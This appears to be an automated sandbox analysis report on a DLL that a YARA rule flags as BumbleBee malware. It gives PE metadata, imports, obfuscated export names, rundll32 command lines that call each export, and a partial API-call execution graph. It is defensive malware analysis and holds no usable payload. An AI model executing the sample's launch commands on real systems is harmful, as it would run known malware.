              call 00007F2CD0B71C36h
              test al, al
              setne al
              dec eax
              add esp, 28h
              ret
              int3
              int3

              Rich Headers

              Programming Language:
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x9b4700x84.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b4f40x28.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1790000x1e0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1760000x1284.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x17a0000x684.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x99eb00x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x99ed00x94.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x278.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x1aad00x1ac00False0.5841121495327103zlib compressed data6.441601663734701IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x1c0000x7fd760x7fe00False0.7084097018572825data6.1148825014907375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x9c0000xd9d480xd8c00False0.5490117232554786data4.556367903742222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .pdata0x1760000x12840x1400False0.465234375data4.91486170750951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .gfids0x1780000x980x200False0.248046875data1.3418312792758706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x1790000x1e00x200False0.53125data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x17a0000x6840x800False0.55810546875data4.962526665636307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_MANIFEST0x1790600x17dXML 1.0 document textEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllCreateFileA, FindFirstFileA, FindNextFileA, SetFileAttributesA, CloseHandle, GetLastError, ConnectNamedPipe, DisconnectNamedPipe, HeapAlloc, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, CreateNamedPipeA, WaitNamedPipeA, GetCurrentActCtx, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, SetLastError, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapFree, GetStdHandle, GetFileType, GetStringTypeW, GetACP, GetTimeZoneInformation, RaiseException, CompareStringW, LCMapStringW, FindClose, FindFirstFileExA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetStdHandle, HeapSize, HeapReAlloc, WriteFile, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

              Exports

              NameOrdinalAddress
              KInMQF10x180018c00
              KwNqBn2l9N20x180015694
              LLBMPMUsqf40x18001af20
              SrNF6Da30x1800184f0

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              No network behavior found

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:07:55:28
              Start date:08/07/2022
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll"
              Imagebase:0x7ff66b7a0000
              File size:140288 bytes
              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:1
              Start time:07:55:28
              Start date:08/07/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Imagebase:0x7ff602050000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:2
              Start time:07:55:29
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:07:55:29
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:8
              Start time:07:55:31
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6560 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:9
              Start time:07:55:31
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6572 -s 324
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:10
              Start time:07:55:32
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:12
              Start time:07:55:34
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6796 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:14
              Start time:07:55:36
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:16
              Start time:07:55:39
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:17
              Start time:07:55:40
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:19
              Start time:07:55:40
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security

              General

              Target ID:21
              Start time:07:55:41
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:23
              Start time:07:55:50
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:24
              Start time:07:55:50
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:25
              Start time:07:55:51
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:27
              Start time:07:56:09
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:29
              Start time:07:56:11
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:2.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:11.9%
                Total number of Nodes:1428
                Total number of Limit Nodes:10
                execution_graph 8538 7ffa535edda8 8539 7ffa535edde1 8538->8539 8541 7ffa535eddb2 8538->8541 8540 7ffa535eddc7 FreeLibrary 8540->8541 8541->8539 8541->8540 7939 7ffa535e4428 7940 7ffa535e4442 7939->7940 7941 7ffa535e4431 7939->7941 7941->7940 7942 7ffa535e7e58 __vcrt_freeptd 15 API calls 7941->7942 7942->7940 7943 7ffa535eee24 GetCommandLineA GetCommandLineW 8542 7ffa535f29a4 8543 7ffa535eea94 49 API calls 8542->8543 8544 7ffa535f29ad 8543->8544 7944 7ffa535faf20 7947 7ffa535e1488 GetProcessHeap HeapAlloc 7944->7947 7949 7ffa535e14cf __scrt_fastfail 7947->7949 7948 7ffa535e1931 7952 7ffa535e1aae 7948->7952 7953 7ffa535e1a3a 7948->7953 7949->7948 7950 7ffa535e19a8 CloseHandle 7949->7950 7951 7ffa535e15be 7949->7951 7950->7948 7964 7ffa535f6898 7951->7964 7955 7ffa535e1aa2 ExitProcess 7952->7955 7958 7ffa535e1ae7 LeaveCriticalSection 7952->7958 7959 7ffa535e1c13 DisconnectNamedPipe 7952->7959 7986 7ffa535f8f2c 7953->7986 7957 7ffa535e170e 7972 7ffa535f6e94 7957->7972 7958->7955 7959->7955 7965 7ffa535f6ad9 7964->7965 7966 7ffa535f696e 7964->7966 7965->7966 7967 7ffa535f6b74 EnterCriticalSection GetLastError 7965->7967 7971 7ffa535f6abc 7966->7971 7995 7ffa535f7a40 7966->7995 7967->7966 7967->7967 7971->7957 7974 7ffa535f6f96 7972->7974 7979 7ffa535f74c4 7972->7979 7973 7ffa535e17c9 7980 7ffa535f84f0 7973->7980 8038 7ffa535f9404 7974->8038 7975 7ffa535f763a GetCurrentThreadId 7976 7ffa535f76c3 7975->7976 7976->7973 7978 7ffa535f7738 GetCurrentActCtx 7976->7978 7978->7976 7979->7973 7979->7975 7979->7976 7981 7ffa535f85bb 7980->7981 7985 7ffa535f85d4 7980->7985 7982 7ffa535f89ad EnterCriticalSection 7981->7982 7981->7985 7983 7ffa535f6e94 4 API calls 7982->7983 7984 7ffa535f8b06 LeaveCriticalSection 7983->7984 7984->7985 7985->7948 7987 7ffa535f8fb7 7986->7987 7993 7ffa535f904a 7986->7993 8042 7ffa535faa40 7987->8042 7989 7ffa535f92f7 7991 7ffa535f9313 SetFileAttributesA 7989->7991 7992 7ffa535f91db 7989->7992 7990 7ffa535f9073 7990->7992 7994 7ffa535f91be GetModuleFileNameA 7990->7994 7991->7992 7992->7955 7993->7989 7993->7990 7994->7992 7996 7ffa535f7ad3 7995->7996 8003 7ffa535f8158 7995->8003 8026 7ffa535f8c00 7996->8026 7997 7ffa535f6a59 8006 7ffa535f9c34 7997->8006 7999 7ffa535f841a ConnectNamedPipe 7999->7997 8000 7ffa535f81a3 InitializeCriticalSection 8001 7ffa535f6e94 4 API calls 8000->8001 8001->8003 8003->7997 8003->7999 8003->8000 8005 7ffa535f8416 8003->8005 8005->7999 8007 7ffa535fa66f 8006->8007 8009 7ffa535f9cfe 8006->8009 8008 7ffa535fa686 GetLastError FindFirstFileA ConnectNamedPipe CreateFileA 8007->8008 8025 7ffa535fa48b 8007->8025 8008->8025 8010 7ffa535e229c 2 API calls 8009->8010 8009->8025 8011 7ffa535fa019 8010->8011 8012 7ffa535e229c 2 API calls 8011->8012 8013 7ffa535fa1ba 8012->8013 8014 7ffa535e229c 2 API calls 8013->8014 8015 7ffa535fa216 8014->8015 8016 7ffa535e229c 2 API calls 8015->8016 8017 7ffa535fa248 8016->8017 8018 7ffa535e229c 2 API calls 8017->8018 8019 7ffa535fa2b0 8018->8019 8020 7ffa535e229c 2 API calls 8019->8020 8021 7ffa535fa356 8020->8021 8022 7ffa535fa60b ExitProcess 8021->8022 8023 7ffa535fa3be 8021->8023 8034 7ffa535e27d4 8023->8034 8025->7971 8027 7ffa535f7b30 8026->8027 8028 7ffa535f8c8a 8026->8028 8030 7ffa535e229c 8027->8030 8028->8027 8029 7ffa535f8d28 FindNextFileA InitializeCriticalSection 8028->8029 8029->8027 8031 7ffa535e22da GetProcessHeap 8030->8031 8033 7ffa535e22d3 __scrt_fastfail 8030->8033 8032 7ffa535e22f7 HeapAlloc 8031->8032 8031->8033 8032->8033 8033->7997 8037 7ffa535e280c 8034->8037 8035 7ffa535e2bf2 8035->8025 8036 7ffa535e2d98 ExitProcess 8036->8037 8037->8035 8037->8036 8039 7ffa535f9a23 8038->8039 8040 7ffa535f94b0 8038->8040 8039->8040 8041 7ffa535f9aac FindFirstFileA CreateNamedPipeA 8039->8041 8040->7979 8041->8039 8043 7ffa535fab1a 8042->8043 8044 7ffa535fab29 8042->8044 8043->8044 8045 7ffa535f9404 2 API calls 8043->8045 8044->7993 8044->8044 8045->8043 8046 7ffa535e8c38 8047 7ffa535e8c79 8046->8047 8048 7ffa535e8c4e 8046->8048 8054 7ffa535ed6a8 EnterCriticalSection 8048->8054 8055 7ffa535f1035 8056 7ffa535f1055 8055->8056 8057 7ffa535f1170 8055->8057 8058 7ffa535f1073 8056->8058 8059 7ffa535f1130 8056->8059 8062 7ffa535f1123 8057->8062 8064 7ffa535f3550 24 API calls 8057->8064 8060 7ffa535f1081 8058->8060 8065 7ffa535f3550 8058->8065 8061 7ffa535f3550 24 API calls 8059->8061 8061->8062 8064->8062 8067 7ffa535f3567 8065->8067 8066 7ffa535f35ea 8066->8062 8067->8066 8069 7ffa535f0c6c 8067->8069 8070 7ffa535f0cac _ctrlfp _handle_error 8069->8070 8071 7ffa535f0d17 _handle_error 8070->8071 8080 7ffa535ec050 8070->8080 8073 7ffa535f0d61 8071->8073 8074 7ffa535f0d24 8071->8074 8087 7ffa535ec07c 8073->8087 8083 7ffa535f0a20 8074->8083 8077 7ffa535f0d5b _ctrlfp 8078 7ffa535f51e0 _FXp_mulh 8 API calls 8077->8078 8079 7ffa535f0d89 8078->8079 8079->8066 8093 7ffa535ebd48 8080->8093 8084 7ffa535f0a64 _ctrlfp _handle_error 8083->8084 8085 7ffa535f0a79 8084->8085 8086 7ffa535ec07c _set_errno_from_matherr 15 API calls 8084->8086 8085->8077 8086->8085 8088 7ffa535ec085 8087->8088 8089 7ffa535ec09a 8087->8089 8090 7ffa535ec092 8088->8090 8092 7ffa535e8380 _get_daylight 15 API calls 8088->8092 8091 7ffa535e8380 _get_daylight 15 API calls 8089->8091 8090->8077 8091->8090 8092->8090 8094 7ffa535ebd87 _clrfp _raise_excf 8093->8094 8095 7ffa535ebf9a RaiseException 8094->8095 8096 7ffa535ebfb6 8095->8096 8096->8071 8097 7ffa535f2530 8098 7ffa535f255d 8097->8098 8099 7ffa535e8380 _get_daylight 15 API calls 8098->8099 8104 7ffa535f2572 8098->8104 8100 7ffa535f2567 8099->8100 8102 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8100->8102 8101 7ffa535f51e0 _FXp_mulh 8 API calls 8103 7ffa535f2857 8101->8103 8102->8104 8104->8101 8105 7ffa535efd30 8115 7ffa535f304c 8105->8115 8116 7ffa535f3058 8115->8116 8138 7ffa535ed6a8 EnterCriticalSection 8116->8138 8549 7ffa535fb5b0 8550 7ffa535fb63d 8549->8550 8551 7ffa535fb68a GetCurrentThreadId 8550->8551 8552 7ffa535fb69a 8550->8552 8551->8552 8140 7ffa535e6c30 8141 7ffa535e6c50 8140->8141 8144 7ffa535e6478 8141->8144 8145 7ffa535e64a8 8144->8145 8146 7ffa535e64ce 8144->8146 8148 7ffa535e8380 _get_daylight 15 API calls 8145->8148 8146->8145 8147 7ffa535e64dc 8146->8147 8149 7ffa535e4ae8 36 API calls 8147->8149 8150 7ffa535e64ad 8148->8150 8153 7ffa535e64e9 8149->8153 8151 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8150->8151 8164 7ffa535e64b8 8151->8164 8154 7ffa535e6523 8153->8154 8165 7ffa535e8604 8153->8165 8155 7ffa535e8380 _get_daylight 15 API calls 8154->8155 8156 7ffa535e683a 8154->8156 8158 7ffa535e687e 8155->8158 8157 7ffa535e8380 _get_daylight 15 API calls 8156->8157 8160 7ffa535e6b2a 8156->8160 8159 7ffa535e6b1f 8157->8159 8161 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8158->8161 8162 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8159->8162 8163 7ffa535e8380 _get_daylight 15 API calls 8160->8163 8160->8164 8161->8156 8162->8160 8163->8164 8166 7ffa535e861f 8165->8166 8168 7ffa535e861b 8165->8168 8167 7ffa535e8639 GetStringTypeW 8166->8167 8166->8168 8167->8168 8168->8153 8169 7ffa535eab2c 8170 7ffa535eab59 __scrt_fastfail 8169->8170 8171 7ffa535eab41 8169->8171 8170->8171 8175 7ffa535eab6e 8170->8175 8172 7ffa535e8380 _get_daylight 15 API calls 8171->8172 8173 7ffa535eab46 8172->8173 8174 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8173->8174 8177 7ffa535eab52 8174->8177 8176 7ffa535e8380 _get_daylight 15 API calls 8175->8176 8175->8177 8176->8177 8553 7ffa535e59ac 8554 7ffa535e59c2 8553->8554 8561 7ffa535e59dd __scrt_fastfail 8553->8561 8555 7ffa535e8380 _get_daylight 15 API calls 8554->8555 8556 7ffa535e59c7 8555->8556 8557 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8556->8557 8571 7ffa535e59d3 8557->8571 8558 7ffa535e59f8 8559 7ffa535e8380 _get_daylight 15 API calls 8558->8559 8559->8571 8561->8553 8561->8554 8561->8558 8565 7ffa535e5a59 8561->8565 8566 7ffa535e8280 17 API calls _isindst 8561->8566 8572 7ffa535eb7e8 8561->8572 8580 7ffa535eaa40 8561->8580 8586 7ffa535eaa70 8561->8586 8592 7ffa535eaaa0 8561->8592 8567 7ffa535e5ad2 8565->8567 8568 7ffa535e5a72 8565->8568 8566->8561 8569 7ffa535eb824 _isindst 32 API calls 8567->8569 8567->8571 8568->8571 8598 7ffa535eb824 8568->8598 8569->8571 8573 7ffa535eb7f6 8572->8573 8574 7ffa535eb81f 8572->8574 8605 7ffa535ed6a8 EnterCriticalSection 8573->8605 8574->8561 8581 7ffa535eaa49 8580->8581 8582 7ffa535eaa59 8580->8582 8583 7ffa535e8380 _get_daylight 15 API calls 8581->8583 8582->8561 8584 7ffa535eaa4e 8583->8584 8585 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8584->8585 8585->8582 8587 7ffa535eaa79 8586->8587 8591 7ffa535eaa89 8586->8591 8588 7ffa535e8380 _get_daylight 15 API calls 8587->8588 8589 7ffa535eaa7e 8588->8589 8590 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8589->8590 8590->8591 8591->8561 8593 7ffa535eaaa9 8592->8593 8594 7ffa535eaab9 8592->8594 8595 7ffa535e8380 _get_daylight 15 API calls 8593->8595 8594->8561 8596 7ffa535eaaae 8595->8596 8597 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8596->8597 8597->8594 8606 7ffa535ed6a8 EnterCriticalSection 8598->8606 7608 7ffa535e3288 7609 7ffa535e3291 __scrt_acquire_startup_lock 7608->7609 7610 7ffa535e3295 __isa_available_init 7609->7610 7612 7ffa535e7350 7609->7612 7613 7ffa535e7384 7612->7613 7614 7ffa535e736e 7612->7614 7616 7ffa535eea94 49 API calls 7613->7616 7615 7ffa535e8380 _get_daylight 15 API calls 7614->7615 7617 7ffa535e7373 7615->7617 7618 7ffa535e7389 GetModuleFileNameA 7616->7618 7620 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 7617->7620 7619 7ffa535e73b6 7618->7619 7639 7ffa535e7130 7619->7639 7638 7ffa535e737f 7620->7638 7625 7ffa535e740f 7628 7ffa535e7130 36 API calls 7625->7628 7626 7ffa535e73fe 7627 7ffa535e8380 _get_daylight 15 API calls 7626->7627 7637 7ffa535e7403 7627->7637 7629 7ffa535e742b 7628->7629 7631 7ffa535e7474 7629->7631 7632 7ffa535e745b 7629->7632 7629->7637 7630 7ffa535e7e58 __vcrt_freeptd 15 API calls 7630->7638 7635 7ffa535e7e58 __vcrt_freeptd 15 API calls 7631->7635 7633 7ffa535e7e58 __vcrt_freeptd 15 API calls 7632->7633 7634 7ffa535e7464 7633->7634 7636 7ffa535e7e58 __vcrt_freeptd 15 API calls 7634->7636 7635->7637 7636->7638 7637->7630 7638->7610 7641 7ffa535e716e 7639->7641 7643 7ffa535e71d4 7641->7643 7651 7ffa535e4c78 7641->7651 7642 7ffa535e72c0 7645 7ffa535e72ec 7642->7645 7643->7642 7644 7ffa535e4c78 36 API calls 7643->7644 7644->7643 7646 7ffa535e7307 7645->7646 7647 7ffa535e730b 7645->7647 7646->7625 7646->7626 7647->7646 7648 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7647->7648 7649 7ffa535e733a 7648->7649 7650 7ffa535e7e58 __vcrt_freeptd 15 API calls 7649->7650 7650->7646 7652 7ffa535e4bd0 7651->7652 7653 7ffa535e4ae8 36 API calls 7652->7653 7654 7ffa535e4bf4 7653->7654 7654->7641 8178 7ffa535f2904 8179 7ffa535f290c 8178->8179 8180 7ffa535f2921 8179->8180 8181 7ffa535f293a 8179->8181 8182 7ffa535e8380 _get_daylight 15 API calls 8180->8182 8183 7ffa535f2931 8181->8183 8185 7ffa535e4ae8 36 API calls 8181->8185 8184 7ffa535f2926 8182->8184 8186 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8184->8186 8185->8183 8186->8183 8187 7ffa535ede00 8188 7ffa535ede26 8187->8188 8189 7ffa535ede3c 8187->8189 8190 7ffa535e8380 _get_daylight 15 API calls 8188->8190 8196 7ffa535edea7 8189->8196 8200 7ffa535ede9a 8189->8200 8209 7ffa535f2864 8189->8209 8217 7ffa535ee00c 8189->8217 8191 7ffa535ede2b 8190->8191 8192 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8191->8192 8195 7ffa535ede35 8192->8195 8194 7ffa535e72ec 15 API calls 8201 7ffa535edf1a 8194->8201 8196->8194 8197 7ffa535edf8f 8199 7ffa535e7e58 __vcrt_freeptd 15 API calls 8197->8199 8199->8200 8202 7ffa535edfd1 8200->8202 8203 7ffa535e7e58 __vcrt_freeptd 15 API calls 8200->8203 8201->8197 8206 7ffa535edff4 8201->8206 8228 7ffa535f1998 8201->8228 8204 7ffa535e7e58 __vcrt_freeptd 15 API calls 8202->8204 8203->8200 8204->8195 8207 7ffa535e8280 _isindst 17 API calls 8206->8207 8208 7ffa535ee008 8207->8208 8210 7ffa535f2883 8209->8210 8211 7ffa535f28fc 8210->8211 8214 7ffa535f2893 8210->8214 8237 7ffa535f530c 8211->8237 8215 7ffa535f51e0 _FXp_mulh 8 API calls 8214->8215 8216 7ffa535f28f2 8215->8216 8216->8189 8218 7ffa535ee03c 8217->8218 8218->8218 8219 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8218->8219 8220 7ffa535ee086 8219->8220 8221 7ffa535f1998 32 API calls 8220->8221 8222 7ffa535ee0b8 8221->8222 8223 7ffa535e8280 _isindst 17 API calls 8222->8223 8224 7ffa535ee11b __scrt_fastfail 8223->8224 8225 7ffa535ee1d6 FindFirstFileExA 8224->8225 8226 7ffa535ee245 8225->8226 8227 7ffa535ee00c 32 API calls 8226->8227 8233 7ffa535f19ad 8228->8233 8229 7ffa535f19b2 8230 7ffa535e8380 _get_daylight 15 API calls 8229->8230 8231 7ffa535f19c8 8229->8231 8232 7ffa535f19bc 8230->8232 8231->8201 8234 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8232->8234 8233->8229 8233->8231 8235 7ffa535f19f7 8233->8235 8234->8231 8235->8231 8236 7ffa535e8380 _get_daylight 15 API calls 8235->8236 8236->8232 8240 7ffa535f5320 IsProcessorFeaturePresent 8237->8240 8241 7ffa535f5336 8240->8241 8246 7ffa535f53bc RtlCaptureContext RtlLookupFunctionEntry 8241->8246 8247 7ffa535f534a 8246->8247 8248 7ffa535f53ec RtlVirtualUnwind 8246->8248 8249 7ffa535f5204 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8247->8249 8248->8247 8607 7ffa535efa98 8608 7ffa535efac2 8607->8608 8613 7ffa535efacc 8607->8613 8609 7ffa535e4ae8 36 API calls 8608->8609 8608->8613 8610 7ffa535efaff 8609->8610 8610->8613 8619 7ffa535e4b78 8610->8619 8614 7ffa535efb38 8616 7ffa535efb75 8614->8616 8617 7ffa535efb4b MultiByteToWideChar 8614->8617 8615 7ffa535efb89 MultiByteToWideChar 8615->8613 8615->8616 8616->8613 8618 7ffa535e8380 _get_daylight 15 API calls 8616->8618 